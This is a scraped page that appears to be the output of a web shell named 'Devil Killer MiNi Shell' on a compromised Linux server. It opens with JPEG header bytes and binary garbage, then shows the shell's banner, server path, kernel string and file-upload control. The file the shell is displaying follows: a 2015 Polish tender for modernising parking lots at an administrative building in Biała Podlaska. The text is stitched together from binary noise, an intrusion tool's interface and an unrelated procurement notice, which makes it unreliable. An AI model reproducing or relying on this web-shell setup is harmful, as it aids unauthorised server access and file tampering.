JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150624/154162-N-2015.html

<p class="kh_header"><b>Lublin: Modernizacja parkingów przy budynku administracyjnym w Białej Podlaskiej przy ul. Warszawskiej 14</b><br>
<b>Numer ogłoszenia: 154162 - 2015; data zamieszczenia: 24.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Nieruchomości Wojewódzkich w Lublinie , ul. Uniwersytecka 4, 20-029 Lublin, woj. lubelskie, tel. 81 532 53 25, faks 81 532 50 78.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.znw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa województwa samorządowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja parkingów przy budynku administracyjnym w Białej Podlaskiej przy ul. Warszawskiej 14.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Modernizacja parkingów przy budynku administracyjnym w Białej Podlaskiej przy ul. Warszawskiej 14 zostanie zlecona  w formule zaprojektuj i wybuduj.  
1. Przedmiot zamówienia obejmuje:
a)  sporządzenie projektu budowlano-wykonawczego i uzyskanie pozwolenia na budowę,
b)  uzyskanie aktualnej mapy sytuacyjno-wysokościowej do celów projektowych,
c)  sporządzenie opracowań kosztorysowych (w tym przedmiary robót, kosztorysy inwestorskie  dla poszczególnych etapów, preliminarz kosztów dla poszczególnych etapów),
d)  sporządzenie specyfikacji technicznych wykonania i odbioru   robót budowlanych (STWiORB),
e)	pełnienie nadzoru autorskiego,
f)	wykonanie robót budowlanych na podstawie opracowanej przez Wykonawcę i zatwierdzonej przez Zamawiającego dokumentacji projektowej oraz ostatecznej decyzji o pozwoleniu na budowę,
g)	opracowanie kompletnej dokumentacji powykonawczej.
          Uwaga!
     1.  Parking przy ul. Warszawskiej 14 w Białej Podlaskiej zlokalizowany jest na terenie układu  urbanistycznego wpisanego do rejestru zabytków.            
     2. Roboty będą wykonywane na terenie nieruchomości przy ul. Warszawskiej 14 w Białej Podlaskiej w trakcie normalnego codziennego funkcjonowania firm i instytucji,  które  mieszczą się w budynku zlokalizowanym na terenie nieruchomości.   
2. Podstawowe  dane o nieruchomości, budynku, zakresie prac projektowych i robót. Budynek  i miejsca parkingowe zostały zlokalizowane na działkach o numerach ewidencyjnych 2111/6, 2111/10 i 2111/1. Jest to budynek wolnostojący na złożonym rzucie. Składa się z trzech niezależnie funkcjonujących części  o zróżnicowanej powierzchni i zróżnicowanej liczbie    kondygnacji od 3 do 7, tworzących kształt kwadratu z wewnętrznym dziedzińcem. Budynek  posiada  żelbetową konstrukcję szkieletową, składającą się z prefabrykowanych  i monolitycznych  słupów oraz rygli i żeber monolitycznych.
Wysokość części nadziemnej budynku:  maksymalnie 22,32 m (budynek SW),  powierzchnia zabudowy - 2745 m2, długość budynku (w przyziemiu)-55 m, szerokość budynku  (w przyziemiu) 49 m,  kategoria zagrożenia ludzi - ZL III.
Opis miejsc parkingowych i zakresu robót, które powinne być uwzględnione w projekcie:
I.   Parking od ulicy Janusza Kusocińskiego - strona zachodnia (etap I):
1. Nośność nawierzchni parkingu dla pojazdów o ciężarze całkowitym do 3,5 ton.
2. Trzy miejsca parkingowe dla niepełnosprawnych przy wejściu do budynku.
3. Nawierzchnia z  kostki brukowej  prostokątnej, kolorystycznie powiązanej z kolorem elewacji.4. 
4. Miejsca parkingowe wyznaczone kostką brukową w kolorze kontrastowym.
5. Wykonanie 2 szlabanów wraz z zasilaniem elektrycznym.
6. Wykonanie 3 pylonów  informacyjnych z zasilaniem elektrycznym.
7. Przestawienie 1 słupa oświetlenia zewnętrznego.
8. Powierzchnia modernizowanego parkingu około 1 250,00 m2.
II. Parking od strony wschodniej (etap II):   
1. Nośność nawierzchni parkingu dla pojazdów o ciężarze całkowitym do 3,5 ton.
2. Likwidacja trawników pomiędzy parkingiem a drogą pożarową oraz przy narożniku budynku od strony północno - wschodniej,   wykonanie na   terenie trawników podbudowy pod miejsca parkingowe.
3.  Nawierzchnia parkingu w narożniku północno-wschodnim budynku z kostki brukowej w kolorze nawierzchni istniejącego parkingu. Pozostałe  nawierzchnie ścieralne z mieszanki asfaltowo-mineralnej.
4.  Przejście dla pieszych oraz oznakowanie poziome, farbą drogową białą od wejścia do przedszkola Biedroneczka do istniejącego placu zabaw.  
5. Powierzchnia modernizowanego parkingu  około 1 070,00 m2.
III.  Miejsca parkingowe wzdłuż drogi pożarowej - strona południowa (etap III):
1. Nośność nawierzchni miejsc parkingowych do 1,5 tony a drogi pożarowej odpowiednio dla pojazdów gaśniczych z pełnym wyposażeniem.
2.  Miejsca parkingowe usytuowane prostopadle do drogi pożarowej.
3.  Nawierzchnia miejsc parkingowych z  kostki brukowej  kolorystycznie powiązanej z kolorem elewacji. 
4.  Miejsca  parkingowe wyznaczone kostką brukową w kolorze kontrastowym. 
5. Nawierzchnia warstwy ścieralnej drogi pożarowej z mieszanki mineralno-asfaltowej.  
6.  Powierzchnia  modernizowanej drogi pożarowej i miejsc parkingowych  około 500,00 m2.
           
 	W projekcie budowlano-wykonawczym i pozostałych opracowaniach należy  przewidzieć etapowanie  robót. 
W zakresie przedmiotowego postępowania zostaną wykonane roboty obejmujące I i II etap modernizacji parkingów z wykonaniem zasilania elektrycznego dla szlabanów i pylonów (zakres dotyczący wykonania szlabanów będzie realizowany jako odrębne zamówienie), zgodnie  z opracowaną  dokumentacją budowlano-wykonawczą i uzyskanym pozwoleniem na budowę   dla wszystkich etapów.  
 Warunki prowadzenia robót:
1.	Zamawiający w terminie 7 dni od otrzymania pozwolenia na budowę  przekaże Wykonawcy plac budowy.
2.	Roboty należy prowadzić w sposób zapewniający bezpieczeństwo osób przebywających w budynku.
3.	Na placu budowy nie mogą przebywać pracownicy firm nie działających na podstawie umów o podwykonawstwo lub dalsze podwykonawstwo zaakceptowane przez ZNW.
4.Wykonawca zobowiązany jest do prowadzenia robót w sposób nie powodujący dewastacji terenu, obiektu, uwzględniający ochronę środowiska,  zapewniając odgrodzenie i zabezpieczenie budynku w miejscach wykonywanych robót  i zapewniający wymagane warunki techniczno-użytkowe.
5.	Wykonawca zobowiązany jest:
- odgrodzić strefę roboczą przed dostępem osób trzecich, poprzez ogrodzenie, oznakowanie,
- zapewnić bezpieczne  przejścia  w zakresie uzgodnionym z administratorem i inspektorem nadzoru,
- zapewnienie dojazdów i dojść do wszystkich części budynku,
- utrzymać w należytym porządku i czystości wspólnie użytkowane drogi komunikacyjne,
- przestrzegać przepisów bhp i ppoż. w okresie realizacji robót,
- utrzymać  czystość  i  porządek  w otoczeniu służącym do  komunikacji Wykonawcy w trakcie   wykonywania robót,
- przygotowanie odbioru.
6.	Materiały użyte w trakcie realizacji przedmiotu zamówienia winne być o najwyższych parametrach  technicznych i najlepszej jakości, odpowiadające potrzebom standardu wykonania tego typu robót i muszą posiadać atesty dopuszczające do stosowania.  Parametry techniczne materiałów i wyrobów użytych do wykonania przedmiotu zamówienia   winny odpowiadać obowiązującym normom oraz spełniać wymogi określone w:
 -  ustawie  z dnia 7 lipca 1994 r. -  Prawo budowlane.  (Dz. U. z  2013 r.  poz.1409, z późn. zm.),
 - ustawie z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. z  2014 r. poz. 883,  z  późn. zm.). 
       Nazwy materiałów, urządzeń lub producentów, które mogą pojawić się w dokumentacji nie należy traktować jako narzuconych; Zamawiający dopuszcza zastosowanie innych, równoważnych do podanych w dokumentacji materiałów i urządzeń spełniających wymagane parametry.
7.	Wykonawca  zobowiązany  jest  do wywiezienia na wysypisko, składowisko lub  złomowisko  materiałów z demontażu, gruzu z rozbiórek, odpadów budowlanych i śmieci. Koszty wywozu  i utylizacji należy uwzględnić w wynagrodzeniu a dokumenty potwierdzające dokonanie wywozu należy dostarczyć Zamawiającemu.
8.Urządzenie   placu   budowy,  zasilanie   placu   budowy   w  wodę  i  energię  elektryczną  oraz   odprowadzenie ścieków (toalety wc) Wykonawca wykona we własnym zakresie i na swój koszt.
9.	W terminie zakończenia robót Wykonawca przygotuje:
-  kompletną dokumentację powykonawczą i  odbiorową wraz ze szczegółowym jej wykazem,
-  zestawienie rzeczowe wykonanych robót.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 140.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępujący   do udziału w przetargu zobowiązany jest wnieść  wadium.
2. Wadium wynosi  5 500,00 zł, (słownie zł: pięć tysięcy pięćset  00/100).                                    
3. Wadium wnosi się przed upływem  terminu  składania ofert.
4. Za datę wniesienia wadium w formie pieniężnej uważa się termin uznania rachunku zamawiającego. 
5. Wadium może być wniesione w jednej  lub  kilku formach określonych w  art. 45 ust. 6 uPzp.
6. Wadium wniesione w  pieniądzu należy wpłacić wyłącznie przelewem na konto Zamawiającego w  Banku PEKAO BP Lublin nr  34 1020 3147 0000 8602 0090 2411  tytułem: Modernizacja parkingów przy budynku administracyjnym w Białej Podlaskiej przy ul. Warszawskiej 14.
7. Kopię dowodu przelewu należy dołączyć do oferty. 
8. Dowód wniesienia wadium w formie innej niż pieniądz należy załączyć w  oryginale do oferty</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że należycie zrealizował   w ciągu  ostatnich 5 lat  przed  dniem otwarcia  ofert, a  jeżeli  okres   prowadzenia działalności jest krótszy - w tym okresie,  jako   wykonawca, minimum 3 roboty   ogólno-budowlane  odpowiadające swoim rodzajem robotom stanowiącym przedmiot zamówienia   o wartości nie mniejszej  niż  100 000 zł (każda)  oraz udokumentuje, że roboty  te zostały wykonane należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. W celu potwierdzenia wykazania spełnienia opisanych wyżej warunków udziału w postępowaniu Wykonawca musi załączyć do oferty dokumenty i oświadczenia określone w pkt. III.4. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę dokumentów, informacji i oświadczeń, według formuły spełnia-nie spełnia wymagane warunki. Za roboty budowlane, odpowiadające swoim rodzajem robotom stanowiącym przedmiot zamówienia, uważa się roboty związane w szczególności z realizacją dróg, parkingów, placów utwardzonych nawierzchnią z kostki brukowej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje co  najmniej 1 osobą posiadającą  uprawnienia  do projektowania w specjalności konstrukcyjno-budowlanej lub drogowej bez ograniczeń lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów,
oraz  dysponuje co  najmniej 1 osobą posiadającą  uprawnienia  budowlane  do  kierowania robotami  budowlanymi w specjalności budowlano-konstrukcyjnej lub drogowej bez ograniczeń lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów.  W celu potwierdzenia wykazania spełnienia opisanych wyżej warunków udziału w postępowaniu Wykonawca musi załączyć do oferty dokumenty i oświadczenia określone w pkt. III.4. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę dokumentów, informacji i oświadczeń, według formuły spełnia-nie spełnia wymagane warunki.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy musi: - wykazać się rocznym przychodem netto ze sprzedaży za każdy rok obrotowy w okresie trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, nie niższym niż 2 000 000 PLN, - posiadać środki finansowe lub zdolność kredytową zapewniające wykonanie przedmiotu zamówienia, - posiadać ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności. W celu potwierdzenia wykazania spełnienia opisanych wyżej warunków udziału w postępowaniu Wykonawca musi załączyć do oferty dokumenty i oświadczenia określone w pkt. III.4. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę dokumentów, informacji i oświadczeń, według formuły spełnia -nie spełnia wymagane warunki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Minimum 3 roboty ogólno-budowlane odpowiadające swoim rodzajem robotom stanowiącym przedmiot zamówienia o wartości nie mniejszej niż 100 000 PLN (każda). Za roboty budowlane, odpowiadające swoim rodzajem robotom stanowiącym przedmiot zamówienia uważa się roboty związane w szczególności z realizacją dróg, parkingów, placów utwardzonych nawierzchnią z kostki brukowej;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony formularz oferty przetargowej - zgodnie z  załącznikiem nr 1 do Siwz,
2)	wypełnione formularze oświadczeń - zgodnie z  załącznikiem nr 2 i nr 3 do Siwz,
3)	dowód wniesienia wadium w wysokości 5 500,00 zł,
4)	pełnomocnictwo (jeżeli jest konieczne) powinno być przedstawione w formie oryginału ub kopii poświadczonej za zgodność z oryginałem przez notariusza, adwokata, radcę prawnego lub osoby, których uprawnienie do reprezentacji wynika z dokumentów rejestracyjnych Wykonawcy, zgodnie ze sposobem reprezentacji określonym w tych dokumentach i winno  być sporządzone w oparciu o przepisy Kodeksu Cywilnego,
5)	upoważnienie (w przypadku określonym w Dziale XI pkt 11 Siwz)  do  pełnienia  funkcji  przedstawiciela/partnera wiodącego powinno być dołączone do oferty w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Termin realizacji - 15</li>
<li>3 - Okres gwarancji - 15</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Ze względu na wystąpienie okoliczności leżących wyłącznie po stronie Zamawiającego lub okoliczności niezależnych zarówno od Zamawiającego jak i Wykonawcy możliwe będzie zmniejszenie zakresu i ilości robót oraz zmiana terminu realizacji umowy. 2. Termin realizacji, o jakim jest mowa w § 2 umowy może ulec przedłużeniu w szczególności na skutek: 
a)  przekroczenia  zakreślonych przez prawo terminów wydawania przez organy administracji   decyzji, zezwoleń, uzgodnień itp.,
b) odmowy wydania przez organy administracji wymaganych decyzji, zezwoleń,
c)	konieczności przesunięcia terminu przekazania terenu budowy, o jakim mowa w § 2 pkt. 8 umowy,
d)	zaistnienia warunków atmosferycznych uniemożliwiających wykonanie przedmiotu umowy   w sposób należyty i zgodny z terminem realizacji umowy,
d) wystąpienia przeszkód archeologicznych,  geologicznych, hydrologicznych lub kolizji  z sieciami  infrastruktury zewnętrznej uniemożliwiających terminową realizację umowy,
e) wystąpienia przerw w dostawach energii elektrycznej lub wody mających istotny  wpływ na termin realizacji umowy,
f)  konieczności udzielenia zamówienia na roboty dodatkowe, których wykonanie miałoby wpływ na zmianę terminu wykonania przedmiotu umowy.
 3. O wystąpieniu okoliczności o jakich mowa jest w pkt 2 lit. a -d Wykonawca zobowiązany jest poinformować Zamawiającego na piśmie niezwłocznie po powzięciu informacji o wystąpieniu takich okoliczności, nie później niż w dniu w którym uzyskał taką informację. 4. Na okoliczność wystąpienia przesłanek mogących mieć wpływ na przedłużenie terminów realizacji umowy, o jakich mowa jest w pkt. l i 2 strony umowy sporządzą pisemny protokół, który po zaakceptowaniu przez Zamawiającego będzie stanowił podstawę do przedłużenia terminu realizacji umowy. 5. Zakres przedmiotu umowy, o jakim jest mowa w § 1 umowy, może ulec zmianie w szczególności na skutek: a) zaistnienia warunków faktycznych na terenie budowy wpływających na zakres lub sposób wykorzystania przedmiotu umowy, c) wprowadzeniu w życie regulacji prawnych po dniu podpisania umowy skutkujących potrzebą zmiany umowy. 6. 